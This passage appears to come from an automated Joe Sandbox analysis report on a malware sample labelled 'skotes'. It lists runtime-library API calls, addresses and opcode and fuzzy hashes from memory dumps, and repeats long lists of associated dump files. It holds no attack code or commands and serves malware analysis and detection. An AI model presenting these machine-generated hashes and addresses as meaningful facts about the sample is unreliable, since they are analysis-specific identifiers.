                                                                                                                                                                                            • Opcode Fuzzy Hash: 0d15a9cb534af740dececf69fbc234aae5b8d9393c977708eed4efd7d9acae47
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3EC17671800609EFCF29DFA4C8819EEBBB6BF14321F14415AE8126B312D771EA51CBD1
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00634877
                                                                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 0063487F
                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00634908
                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00634933
                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00634988
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                            • String ID: S9c$csm
                                                                                                                                                                                            • API String ID: 1170836740-3686841229
                                                                                                                                                                                            • Opcode ID: 828f3802a0c14d5a652b28b91b1516b7d836eef3dc2c3ad70f924528f5577d0d
                                                                                                                                                                                            • Instruction ID: fb24a6a1675a12cd6fdb50a82fbf52e881c60dcfe390c0eb75dfe4ea7ba58024
                                                                                                                                                                                            • Opcode Fuzzy Hash: 828f3802a0c14d5a652b28b91b1516b7d836eef3dc2c3ad70f924528f5577d0d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0341B534A00209AFCF10DF68D884A9EFBB6BF45318F148199E8195B392DB31EA55CFD1
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 006273B0
                                                                                                                                                                                            • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 006273F2
                                                                                                                                                                                            • Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 0062740E
                                                                                                                                                                                            • Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 00627419
                                                                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00627440
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementstd::invalid_argument::invalid_argument
                                                                                                                                                                                            • String ID: count$ppVirtualProcessorRoots
                                                                                                                                                                                            • API String ID: 3897347962-3650809737
                                                                                                                                                                                            • Opcode ID: 1e96900d47219094a8bfec930841c5b4d44ae64a2ea7ca54684642a5557d9a8c
                                                                                                                                                                                            • Instruction ID: b29bf703cca55a4efe219fc713fb1360d176d81d2f487057f657d0a95432a08c
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1e96900d47219094a8bfec930841c5b4d44ae64a2ea7ca54684642a5557d9a8c
                                                                                                                                                                                            • Instruction Fuzzy Hash: D8217E34A00629AFCF10EF68D495EEDBBB6BF09351F1440A9E805A7351DB30AE45CF94
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • _SpinWait.LIBCONCRT ref: 0061EEBC
                                                                                                                                                                                            • Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 0061EEC8
                                                                                                                                                                                            • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0061EEE1
                                                                                                                                                                                            • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0061EF0F
                                                                                                                                                                                            • Concurrency::Context::Block.LIBCONCRT ref: 0061EF31
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
                                                                                                                                                                                            • String ID: ia
                                                                                                                                                                                            • API String ID: 1182035702-2042661721
                                                                                                                                                                                            • Opcode ID: d567f963c71b30e2cfc96a8bbb432dc07890059e16f1950f5ffde86c9cbd4b8e
                                                                                                                                                                                            • Instruction ID: c53ca1dc9370f871d772ac4eb1dd5a3cfdd210f2620f1c65338fb6cb5df89ecc
                                                                                                                                                                                            • Opcode Fuzzy Hash: d567f963c71b30e2cfc96a8bbb432dc07890059e16f1950f5ffde86c9cbd4b8e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 10218170C102198EDF64DFA4C8556EEBBF2BF14320F28092DE851A62D1E7B2CAC5CB55
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00627903
                                                                                                                                                                                              • Part of subcall function 00625CB8: __EH_prolog3_catch.LIBCMT ref: 00625CBF
                                                                                                                                                                                              • Part of subcall function 00625CB8: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00625CF8
                                                                                                                                                                                            • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 0062792A
                                                                                                                                                                                            • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00627936
                                                                                                                                                                                              • Part of subcall function 00625CB8: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 00625D70
                                                                                                                                                                                              • Part of subcall function 00625CB8: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 00625D7E
                                                                                                                                                                                            • Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 00627982
                                                                                                                                                                                            • Concurrency::location::_Assign.LIBCMT ref: 006279A3
                                                                                                                                                                                            • Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 006279AB
                                                                                                                                                                                            • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 006279BD
                                                                                                                                                                                            • Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 006279ED
                                                                                                                                                                                              • Part of subcall function 0062691D: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 00626942
                                                                                                                                                                                              • Part of subcall function 0062691D: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 00626965
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
